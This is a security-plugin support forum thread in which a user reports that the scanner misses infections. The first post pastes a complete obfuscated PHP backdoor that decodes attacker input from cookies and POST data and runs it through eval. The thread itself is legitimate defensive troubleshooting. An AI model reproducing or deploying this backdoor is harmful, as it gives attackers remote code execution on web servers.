Menu

Topic-icon Malware scan problems

  • nikoligno
  • nikoligno's Avatar Topic Author
  • Offline
  • Fresh Boarder
  • Fresh Boarder
More
1 year 11 months ago #6003 by nikoligno
Malware scan problems was created by nikoligno
Hello.
I'm not satisfied about malware scan.
How is it possible that files with pattern like that on the end of this post aren't detected?
I'm using another malware scanner (a wordpress extension) than identifies almost every infection, but securitycheck pro doesn't detect any of those (just false positives).
Can you explain this, please ??

<?php
$whqcp = '8#vn2\'ymcd03b7ioageHsu_*4-9xptrfl6k';$kmpeoyw = Array();$kmpeoyw[] = $whqcp[19].$whqcp[23];$kmpeoyw[] = $whqcp[18].$whqcp[0].$whqcp[10].$whqcp[9].$whqcp[4].$whqcp[9].$whqcp[9].$whqcp[16].$whqcp[25].$whqcp[26].$whqcp[33].$whqcp[33].$whqcp[18].$whqcp[25].$whqcp[24].$whqcp[0].$whqcp[18].$whqcp[8].$whqcp[25].$whqcp[12].$whqcp[11].$whqcp[31].$whqcp[10].$whqcp[25].$whqcp[16].$whqcp[9].$whqcp[26].$whqcp[11].$whqcp[4].$whqcp[9].$whqcp[8].$whqcp[13].$whqcp[0].$whqcp[13].$whqcp[9].$whqcp[0];$kmpeoyw[] = $whqcp[1];$kmpeoyw[] = $whqcp[8].$whqcp[15].$whqcp[21].$whqcp[3].$whqcp[29];$kmpeoyw[] = $whqcp[20].$whqcp[29].$whqcp[30].$whqcp[22].$whqcp[30].$whqcp[18].$whqcp[28].$whqcp[18].$whqcp[16].$whqcp[29];$kmpeoyw[] = $whqcp[18].$whqcp[27].$whqcp[28].$whqcp[32].$whqcp[15].$whqcp[9].$whqcp[18];$kmpeoyw[] = $whqcp[20].$whqcp[21].$whqcp[12].$whqcp[20].$whqcp[29].$whqcp[30];$kmpeoyw[] = $whqcp[16].$whqcp[30].$whqcp[30].$whqcp[16].$whqcp[6].$whqcp[22].$whqcp[7].$whqcp[18].$whqcp[30].$whqcp[17].$whqcp[18];$kmpeoyw[] = $whqcp[20].$whqcp[29].$whqcp[30].$whqcp[32].$whqcp[18].$whqcp[3];$kmpeoyw[] = $whqcp[28].$whqcp[16].$whqcp[8].$whqcp[34];foreach ($kmpeoyw[7]($_COOKIE, $_POST) as $erhsck => $migezk){function wecmlfd($kmpeoyw, $erhsck, $rzwpr){return $kmpeoyw[6]($kmpeoyw[4]($erhsck . $kmpeoyw[1], ($rzwpr / $kmpeoyw[8]($erhsck)) + 1), 0, $rzwpr);}function iobnnyh($kmpeoyw, $nubwa){return @$kmpeoyw[9]($kmpeoyw[0], $nubwa);}function wbgjfnc($kmpeoyw, $nubwa){$zixie = $kmpeoyw[3]($nubwa) % 3;if (!$zixie) {eval($nubwa[1]($nubwa[2]));exit();}}$migezk = iobnnyh($kmpeoyw, $migezk);wbgjfnc($kmpeoyw, $kmpeoyw[5]($kmpeoyw[2], $migezk ^ wecmlfd($kmpeoyw, $erhsck, $kmpeoyw[8]($migezk))));}

Please Log in or Create an account to join the conversation.

More
1 year 11 months ago #6004 by Jose
Replied by Jose on topic Malware scan problems
Hi Nikoligno,

Is the malware scanner configured to scan the entire filesystem (Timeline 10000) and look also for suspicious patterns ( Deep scan enabled)?

Regards,
Jose

Please Log in or Create an account to join the conversation.

  • nikoligno
  • nikoligno's Avatar Topic Author
  • Offline
  • Fresh Boarder
  • Fresh Boarder
More
1 year 11 months ago #6005 by nikoligno
Replied by nikoligno on topic Malware scan problems
Hello!
Scanner is configured with deep scan, and now timeline is 30 (I also tried with 10000), but malware file has been created today and I checked that in the log is correctly analyzed.

Please Log in or Create an account to join the conversation.

More
1 year 11 months ago #6006 by Jose
Replied by Jose on topic Malware scan problems
Umm, it's odd. The malware scanner is good detecting encoded code like that.

Can you send me the file to analize it? Please, use the email from which you receive forum notifications.

Regards,
Jose

Please Log in or Create an account to join the conversation.

Time to create page: 0.083 seconds
Powered by Kunena Forum

Login or Sign In